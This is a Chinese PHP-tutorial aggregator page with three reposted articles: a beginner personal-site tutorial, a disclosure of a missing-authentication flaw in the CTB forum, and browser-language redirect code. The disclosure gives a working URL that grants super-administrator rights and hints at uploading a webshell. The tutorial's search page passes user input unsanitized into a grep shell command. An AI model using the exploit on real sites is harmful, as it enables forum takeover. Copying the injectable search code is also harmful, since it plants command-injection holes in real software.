当前位置:  编程技术>php
本页文章导读:
    ▪3.从实例开始       3 PHP实践 PHP的许多特点与其他软件或者工具有关。利用迄今为止我们所学到的PHP知识,我们可以试着建立一个简单交互的网站。利用这一过程我们又可以学到不少东西。.........
    ▪漂亮但不安全的CTB       >>>Dedicated This Scrap To CaoJing<<< 涉及版本: ^^^^^^^ 目前所有版本(现在1.3Alpha为最高版本) 描述: ^^^^^^ CTB是一款由实易数码<11cn.org>;开发和维护的.........
    ▪自动跳转中英文页面       PHP 网页根据来访这的浏览器语言不同自动跳转中英文页面 演示:http://www.gabion.cn当来访者浏览器语言是中文就进入中文版面国外的用户默认浏览器不是中文的就跳转英.........

[1]3.从实例开始
    来源: 互联网  发布时间: 2013-11-30

3 PHP实践 


PHP的许多特点与其他软件或者工具有关。利用迄今为止我们所学到的PHP知识,我们可以试着建立一个简单交互的网站。利用这一过程我们又可以学到不少东西。好吧,我们现在开始专注于一个典型个人网站的建设。



3.1 计划一个站点

一般一个个人站点包括一个欢迎页面、一个留言本页面、一个书签链接页面、一个计数器、联系信息,甚至还有照片集和一些音乐文件等等。让我们从一个标题页面、一个联系信息页面和一个简历页面开始。我们同样需要标准的通用的页面头部和底部。



标题页面--front.html





这里我们有一个非常简单的html文件:

<HTML>

<HEAD>

<TITLE>

我的个人主页--欢迎

</TITLE>

</HEAD>

<BODY>

<H1>

我的个人主页

</H1>

<H2>

欢迎

</H2>

<HR>

<P>

欢迎来我的寒舍,虽然这里现在暂时还没有什么。

</P>

<P>

不过我希望马上就可以多起来。

</P>

<HR>

<P ALIGN="CENTER">

<SMALL> <I>

Copyright ? 我自己,1999

</I> </SMALL>

</P>

</BODY>

</HTML>



联系信息页面--count.html



同样我们又有了一个简单页面:

<HTML>

<HEAD>

<TITLE>

我的个人主页--联系信息

</TITLE>

</HEAD>

<BODY>

<H1>

我的个人主页

</H1>

<H2>

联系信息

</H2>

<HR>

<P>

你可以通过1-800-PHP-INFO联系我

</P>

<HR>

<P ALIGN="CENTER">

<SMALL> <I>

Copyright ? 我自己,1999

</I> </SMALL>

</P>

</BODY>

</HTML>





3.2 HTML到PHP



从上面你可以看出,每个页面有相同的头部和底部。像上面那样每个页面都写入相同的信息在工作量少的时候还可以,但是想象一下当有100多页面且你需要全部更改其头部或底部时你要花费多大精力?一页一页的手工更改是一件多么冗长无趣的事情啊!所以我们应该为这些页面编写PHP的头部和底部文件,之后我们只要在每个HTML页面中引用它们就行了。我们将把这些include文件放在一个叫include的子目录下。下面我们就把这些站点的通用内容写进文件中。



全站通用变量设定:common.inc

<?

// 全站通用变量

$MyEmail = "phptalk@tnc.org";

$MyEmailLink = "<a href=/index.html"mailto:$MyEmail\">$MyEmail</a>";

$MyName = "PHP Talk";

$MySiteName = $MyName."'s Home Page";

?>



通用页面头部:header.inc

<?

// 定义通用页面头部

?>

<HTML>

<HEAD>

<TITLE>

<? echo "$MySiteName - $title"; ?>

</TITLE>

</HEAD>

<BODY>

<H1>

<? echo "$MySiteName"; ?>

</H1>

<H2>

<? echo "$title"; ?>

</H2>

<HR>



通用页面底部:footer.inc

<?

// 通用页面底部

?>

<HR>

<P ALIGN="CENTER">

<SMALL> <I>

Copyright ? by 

<? echo "$MyName ($MyEmailLink)"; ?>

, 1999

</I> </SMALL>

</P>

</BODY>

</HTML>



新的页面front.php3:

<?

include("include/common.inc");

$title = "Welcome";

include("include/header.inc");

?>

<P>

欢迎来我的寒舍,虽然这里现在暂时还没有什么。

</P>

<P>

不过我希望马上就可以多起来。

</P>

<?

include("include/footer.inc");

?>



新的cont.php3:

<?

include("include/common.inc");

$title = "Contact Information";

include("include/header.inc");

?>

<P>

你可以通过1-800-PHP-INFO联系我

</P>

<?

include("include/footer.inc");

?>



现在你就可以猜出这样安排的好处了。如果你想改动页面的头部或者底部,你只需要改动相应的文件就可以了。如果你要修改你的e-mail地址甚至你的名字,只要修改common.inc文件就行了。另外值得注意的是你可以把具有任何文件名或者文件扩展名的文件包含进你的文件中,你甚至可以包含其他站点上的文件。



3.3 计数器



让我们在首页上加上一个计数器。这个例子已经被讲过多次了,但是还是有利于演示怎样读写文件以及创建自己的函数。counter.inc包含以下代码:

<?

/*


 一个简单的计数器

*/

function get_hitcount($counter_file)

{

/* 将计数器归零

这样如果计数器还未被使用,初始值将是1

你当然也可以把初始值设成20000来骗人咯

*/

$count=0;

// 如果存放计数器文件已经存在,读取其中的内容

if ( file_exists($counter_file) ) 

{

$fp=fopen($counter_file,"r");

// 我们只取了前20位,希望你的站点不要太受欢迎啊

$count=0+fgets($fp,20);

// 由于函数fgets()返回字符串,我们可以通过加0的方法将其自动转换为整数

fclose($fp);

// 对文件操作完毕

}

// 增加一次计数值

$count++;

// 将新的计数值写入文件

$fp=fopen($counter_file,"w");

fputs($fp,$count);

fclose($fp);

# 返回计数值

return ($count);

}

?>

然后我们更改front.php3文件以显示这个计数器:

<?

include("include/counter.inc");

// 我把计数值放在文件counter.txt中,读出并输出

printf ("<CENTER><B>%06d</B></CENTER> <BR> 
\n",

get_hitcount("counter.txt"));

include("include/footer.inc");

?>

看看我们的新front.php3



3.4 反馈表单



让我们再添加一个反馈表单以便你的浏览者填写并e-mail给你。举例来说我们用一种很简单的方法实现它,我们只需要两个页面:一个为浏览者提供输入表单;一个获得表单数据并处理、mail给你。



PHP中获取表单数据是很简单的。当一个表单被发送后,表单中所包含的各个元素被赋上了相应的值,而这样就可以像引用一般变量一样使用了。

<FORM name="myform" ACTION="/blog_article/process_form.html" METHOD="POST">

<INPUT TYPE="TEXT" NAME="mytext" VALUE="Some Value">

</FORM>



在process_form.php3中,变量$mytext就被赋予了输入的值--非常简单!同样的,你可以从列表框、多选框、单选框、按钮等表单元素中取得变量值。你唯一要做的就是为表单中的每一个元素取名以便将来可以引用。



根据这个方法,我们可以生成一个简单的包含三个元素的表单:姓名、e-mail地址和留言。当浏览者发送表单后,处理该表单的PHP页面(sendfdbk.php3)读取数据,检查姓名是否为空,最后将数据mail给你。



表单:form.php3

<?

include("include/common.inc");

$title = "Feedback";

include("include/header.inc");

?>

<P>

<FORM ACTION="/blog_article/sendfdbk.html" METHOD="POST">

<INPUT TYPE="text" NAME="name" value="Your name" 
SIZE="20" MAXLENGTH="30">

<INPUT TYPE="text" MAXLENGTH="40" WIDTH="20" 
value="Your Email" NAME="email">

<BR>

<TEXTAREA ROWS="7" COLS="40" NAME="comment">

Your feedback on my home page.

</TEXTAREA>

<BR>

<INPUT TYPE="submit" VALUE="Send Feedback!">

</FORM>

</P>

<?

include("include/footer.inc");

?>



处理表单:sendfdbk.php3

<?

include("include/common.inc");

$title = "Feedback";

include("include/header.inc");

if ( $name == "" ) 

{

// 现在我很讨厌匿名的留言!

echo "Duh ? How come you are anonymous?";



elseif ($name == "Your name") 

{

// 这个浏览者真是不想透露姓名啊!

echo "Hello ? <B>Your name</B> is supposed to be replaced with

your actual name!</B>";



else 

{

// 输出一段礼貌的感谢语

echo "

Hello, $name.

<BR>

Thank you for your feedback. It is greatly appreciated.

<BR>

Thanking you

<BR>

$MyName <BR>

$MyEmailLink

";

// 最后mail出去

mail($MyEmail, "Feedback.","

Name : $name

E-mail : $email

Comment : $comment 

");

}

include("include/footer.inc");

?>



3.5 简单的站内搜索引擎



PHP可以调用外部程序。在Unix环境下我们可以利用程序grep实现一个简单的搜索引擎。我们可以做的稍微复杂一些:使用一个页面既输出一个表单供用户输入搜索字串又输出查询结果。

<?

include("include/common.inc");

$title = "Search";

include("include/header.inc");

?>

<P>

<FORM ACTION="/blog_article/</ echo.html"$PHP_SELF"; ?>" METHOD="POST">

<INPUT TYPE="text" NAME="searchstr" value="<? 
echo "$searchstr"; ?>"

SIZE="20" MAXLENGTH="30">

<INPUT TYPE="submit" VALUE="Search!">

</FORM>

</P>

<?

if ( ! empty($searchstr) ) 

{

// empty()用来检查查询字串是否为空

// 如果不为空,调用grep查询

echo "<HR>\n";

// 调用grep对所有文件进行大小写非敏感模式的查询

$cmdstr = "grep -i $searchstr *";

$fp = popen( $cmdstr, "r" ); // 执行命令并输出管道

$myresult = array(); // 存储查询结果

while( $buffer = fgetss ($fp, 4096)) 

{

// grep返回这样格式: 文件名:匹配字串出现行数

// 因此我们利用函数split()分离处理数据

list($fname, $fline) = split(":",$buffer, 2);

// 我们只输出第一次匹配的结果

if ( !defined($myresult[$fname]))

$myresult[$fname] = $fline;

}

// 现在我们将结果存储在数组中,下面就可以处理并输出了 

if ( count($myresult) )

{

echo "<OL>\n";

while(list($fname,$fline) = each($myresult))

echo "<LI>

<A HREF=\"$fname\">$fname</A> : $fline </LI>\n";

echo "</OL>\n";



else 

{

// 如果没有查询结果

echo "Sorry. Search on <B>$searchstr</B>

returned no results.<BR>\n";

}

pclose($fp);

}

?>

<?

include("include/footer.inc");

?>





注释:



PHP_SELF是PHP内建的变量。包含当前文件名。 

fgets()按行读取文件,最多4096(指定)字符长度。 

fgetss()与fgets()相似,只是解析输出的HTML标记。 

split()有一个参数是2,因为我们只需要把输出分成两部分。另外需要省略":"。 

each()是一个数组操作函数,用来更方便的遍历整个数组。 

popen()、pclose()与fopen()、fclose()的功能很相似,只是增加了管道处理。 

请注意以上的代码并不是实现一个搜索引擎的好办法。这只是有助于我们更好学习PHP而举出的一个例子而已。理想的情况是你应该建立一个包含关键字的数据库然后进行搜索。

    
[2]漂亮但不安全的CTB
    来源: 互联网  发布时间: 2013-11-30

>>>Dedicated This Scrap To CaoJing<<< 

涉及版本: 
^^^^^^^ 
目前所有版本(现在1.3Alpha为最高版本) 

描述: 
^^^^^^ 
CTB是一款由实易数码<11cn.org>;开发和维护的源代码开放的PHP论坛。由于其后台管理文件验证存在缺陷,可能导致非法用户直接添加论坛超级管理员,进而威胁论坛或服务器安全。 

具体: 
^^^^ 
CTB书写非常规范,代码井然有序,赏心悦目,的确是优美的程序;特别是其功能模块,着实让小弟学习了一把。但安全方面却令人堪忧: 

试看如下代码: 

/admin/main.php 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 //获取get变量 
   if( is_array($_GET) ) { 
      foreach($_GET as $k=>$v) { 
           if( is_array( $_GET[$k]) ) { 
               foreach($_GET[$k] as $k2=>$v2) { 
                   $return[$k][$k2] = $v2; 
               } 
           } else { 
               $return[$k] = $v; 
           } 
       } 

... 
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod']; 
   if (!file_exists($mod.".php" { 
       $mod = "mainright"; 
   } 
   require_once ($mod.".php"; 
   //----------------------------------------------------------------------------- 

   //初始化类变量 
   $ctb = new Module; 
   $ctb->set = $set; 
   $ctb->tplPath = "./templates"; 
   $ctb->input = $return; 
   $ctb->sess = isset($_COOKIE["sess_adminname"]) ? $_COOKIE : $_SESSION; 
   $ctb->execute(); 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

这里没有任何验证,我们看看添加管理员的文件: 

/admin/systemuser.php 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
class Module extends CommonClass 
//系统管理模块子类 

   function execute() { 
       switch($this->input['action']) { 
... 
case 'addSystemUser': 
               $this->addSystemUser(); 
               break; 
... 
    }       
   } 

function addSystemUser() 

   //输入数据简单格式化 
   $this->inputCheck("main.php?mod=systemuser&action=showSystemUser"; 
   //执行添加操作 
        $this->file = "../".$this->set[dataPath]."/users/list.php"; 
   $systemLine = $this->select(4, $this->input['systemUserName']); 
.... 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

依然没有验证,一路顺利啊! 

利用方法: 
^^^^^^^ 
先注册一个用户: 

登陆ID:  cat 
用户名 :   dog 
密码:      ilikecat 
重复密码:  ilikecat 
信箱:      cat@dog.com 

接着提交如下URL: 

http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser

哈哈,你现在已经是超级管理员了,不相信?提交如下URL后台登陆: 

http://www.psych.com/ctb/admin/main.php?mod=login 

管理名称:  cat 
管理密码:  ilikecat 

咦...还真成功了! 

你现在是不是想更改后台上传文件类型,然后upload webshell?哼,被我猜到了吧... 

后记:另外发现CTB代码注释有些扎眼的错别字,大煞风景,希望可以一起修正。

    
[3]自动跳转中英文页面
    来源: 互联网  发布时间: 2013-11-30

PHP 网页根据来访这的浏览器语言不同自动跳转中英文页面 
演示:http://www.gabion.cn
当来访者浏览器语言是中文就进入中文版面
国外的用户默认浏览器不是中文的就跳转英文页面



PHP代码:

<?
        $lan = substr($HTTP_ACCEPT_LANGUAGE,0,5);
        if ($lan == "zh-cn")
                print("<meta http-equiv='refresh' content = '0;URL = gb/index.htm'>");
        else
                print("<meta http-equiv='refresh' content = '0;URL = eng/index.htm'>");
?>

HTML网页根据来访这的浏览器语言不同自动跳转多语言页面 


在 <head> </head> 之间加入如下代码。

<script> 
var type=navigator.appName 
if (type=="Netscape") 
var lang = navigator.language 
else 
var lang = navigator.userLanguage 

//cut down to first 2 chars of country code 
var lang = lang.substr(0,2) 

// 英语
if (lang == "en") 
window.location.replace('url') 

// 简体中文
else if (lang == "zh-cn") 
window.location.replace('url') 

// 繁体中文
else if (lang == "zh-tw") 
window.location.replace('url') 

// 德语
else if (lang == "de") 
window.location.replace('url') 


// 除上面所列的语言
else 
window.location.replace('url')

</script>


    
最新技术文章:
▪PHP函数microtime()时间戳的定义与用法
▪PHP单一入口之apache配置内容
▪PHP数组排序方法总结(收藏)
▪php数组排序方法大全(脚本学堂整理奉献)
▪php数组排序的几个函数(附实例)
▪php二维数组排序(实例)
▪php根据键值对二维数组排序的小例子
▪php验证码(附截图)
▪php数组长度的获取方法(三个实例)
▪php获取数组长度的方法举例
▪判断php数组维度(php数组长度)的方法
▪php获取图片的exif信息的示例代码
▪PHP 数组key长度对性能的影响实例分析
▪php函数指定默认值的方法示例
▪php提交表单到当前页面、提交表单后页面重定...
▪php四舍五入的三种实现方法
▪php获得数组长度(元素个数)的方法
▪php日期函数的简单示例代码
▪php数学函数的简单示例代码
▪php字符串函数的简单示例代码
▪php文件下载代码(多浏览器兼容、支持中文文...
▪php实现文件下载、支持中文文件名的示例代码...
▪php文件下载(防止中文文件名乱码)的示例代码
▪解决PHP文件下载时中文文件名乱码的问题
▪php数组去重(一维、二维数组去重)的简单示例
▪php小数点后取两位的三种实现方法
▪php Redis 队列服务的简单示例
▪PHP导出excel时数字变为科学计数的解决方法
▪PHP数组根据值获取Key的简单示例
▪php数组去重的函数代码示例
 


站内导航:


特别声明:169IT网站部分信息来自互联网,如果侵犯您的权利,请及时告知,本站将立即删除!

©2012-2021,,E-mail:www_#163.com(请将#改为@)

浙ICP备11055608号-3